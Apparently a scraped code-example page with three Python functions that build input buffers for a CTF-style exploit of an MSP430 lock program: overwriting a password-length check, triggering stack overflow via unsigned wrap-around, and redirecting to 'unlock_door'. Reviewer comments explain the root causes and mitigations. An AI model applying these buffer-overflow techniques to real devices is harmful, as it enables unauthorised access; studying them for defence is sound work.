Ejemplo n.º 1
def ub():
    """Return the first-stage input buffer with two positions patched.

    The buffer starts as the decoded output of ``utils.mk_test_hex(0x63*2)``
    (presumably 0x63 bytes of a recognisable test pattern -- confirm against
    ``utils``). Two positions are then modified; the intent of each, as
    recorded by the original author, is noted inline.

    Reviewer note: the issue this exercises on the target is a length-check
    value stored within reach of the input buffer. Bounding the copy to the
    destination size is the mitigation.
    """
    pattern_hex = utils.mk_test_hex(0x63 * 2)
    payload = bytearray(unhexlify(pattern_hex))
    # This lands on the value the target uses as the minimum password length.
    # It is kept low so the check passes, but non-zero so that the byte does
    # not terminate the string early.
    payload[0x11] = 1
    # Original author's note: "smash the stack!"
    # NOTE(review): the slice 0x2a:0x2b is one byte wide but two bytes are
    # assigned, so the bytearray grows by one and every later byte shifts up
    # by one. Confirm whether 0x2a:0x2c was intended.
    payload[0x2a:0x2b] = [0x4a, 0x44]
    return payload
Ejemplo n.º 2
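def pb(ub=bytearray(b'')):
    '''
    Build the second-stage (password) buffer.

    Right after the "Please enter your password" prompt, the target does some
    dodgy math to try to figure out the len argument to getsn for the password:

        45c8:  3e40 1f00      mov       #0x1f, r14
        45cc:  0e8b           sub       r11, r14
        45ce:  3ef0 ff01      and       #0x1ff, r14

    i.e.:

        r11 == len(ub) == 0x20
        r14 = 0x1f
        r14 -= r11 # whoops! unsigned wrap-around: r14 == 0xffff
        r14 &= 0x1ff # r14 == 0x1ff

    Reviewer note: the root cause shown above is a length derived by
    subtraction with no check that the first input is shorter than 0x1f.
    Validating that length before subtracting (or rejecting a wrapped result)
    removes the oversized read.

    Args:
        ub: Unused by this function. The default is written as a bytes
            literal because ``bytearray('')`` raises TypeError on Python 3
            when the ``def`` statement is evaluated; the value is unchanged
            on Python 2.

    Returns:
        A bytearray decoded from ``utils.mk_test_hex(plen*2)`` with bytes
        4 and 5 replaced.
    '''
    # '-' binds tighter than '&' in Python, so this was already
    # (0x1f - 0x20) & 0x1ff == 0x1ff; the parentheses only make that explicit.
    plen = (0x1f - 0x20) & 0x1ff
    buf = bytearray(unhexlify(utils.mk_test_hex(plen * 2)))
    # Two-byte value the original author labels "the return address for
    # unlock_door"; the slice is two bytes wide, so the length is unchanged.
    buf[4:6] = [0x4c, 0x44]
    # Original comment: "password must be zero-terminated at 0x11".
    # NOTE(review): nothing in this function writes to index 0x11 -- the
    # comment looks stale or refers to handling elsewhere; confirm.
    return buf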
Ejemplo n.º 3
def ub():
    """Return the unmodified first-stage input buffer.

    The buffer is the decoded output of ``utils.mk_test_hex(0x20*2)``
    (presumably 0x20 bytes -- confirm against ``utils``). Per the original
    author, 0x20 is the largest size that can be used here.
    """
    # 0x20 is the max we can get away with
    pattern_hex = utils.mk_test_hex(0x20 * 2)
    return bytearray(unhexlify(pattern_hex))